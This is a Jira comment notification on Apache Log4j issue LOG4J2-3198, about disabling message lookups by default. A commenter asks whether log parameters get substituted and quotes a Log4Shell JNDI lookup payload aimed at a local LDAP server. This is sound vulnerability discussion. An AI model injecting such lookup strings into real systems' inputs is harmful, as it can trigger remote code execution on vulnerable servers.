[jira] [Comment Edited] (LOG4J2-3198) Message lookups should be disabled by default

Fri, 10 Dec 2021 10:01:07 -0800 


    [ 
https://issues.apache.org/jira/browse/LOG4J2-3198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17457298#comment-17457298
 ] 

Eric Everman edited comment on LOG4J2-3198 at 12/10/21, 6:00 PM:
-----------------------------------------------------------------

Is there any possible configuration where the text of substituted parameters 
are substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", 
request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??

 

Apparently the answer is 'yes', at least according to the [lunasec.io post on 
this vulnerability|https://www.lunasec.io/docs/blog/log4j-zero-day/].


was (Author: [email protected]):
Is there any possible configuration where the text of substituted parameters 
are substituted?  For instance:
{code:java}
logger.debug("User entered '{}', which is invalid", 
request.getParameter());{code}
and 'request.getParameter()' returns something like:
{code:java}
${jndi:ldap://127.0.0.1:1389/a}{code}
??

> Message lookups should be disabled by default
> ---------------------------------------------
>
>                 Key: LOG4J2-3198
>                 URL: https://issues.apache.org/jira/browse/LOG4J2-3198
>             Project: Log4j 2
>          Issue Type: Improvement
>          Components: Layouts
>    Affects Versions: 2.14.1
>            Reporter: Carter Kozak
>            Assignee: Carter Kozak
>            Priority: Major
>             Fix For: 2.15.0
>
>
> Lookups in messages are confusing, and muddy the line between logging APIs 
> and implementation. Given a particular API, there's an expectation that a 
> particular shape of call will result in specific results. However, lookups in 
> messages can be passed into JUL and will result in resolved output in log4j 
> formatted output, but not any other implementations despite no direct 
> dependency on those implementations.
> There's also a cost to searching formatted message strings for particular 
> escape sequences which define lookups. This feature is not used as far as 
> we've been able to tell searching github and stackoverflow, so it's 
> unnecessary for every log event in every application to burn several cpu 
> cycles searching for the value.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

Reply via email to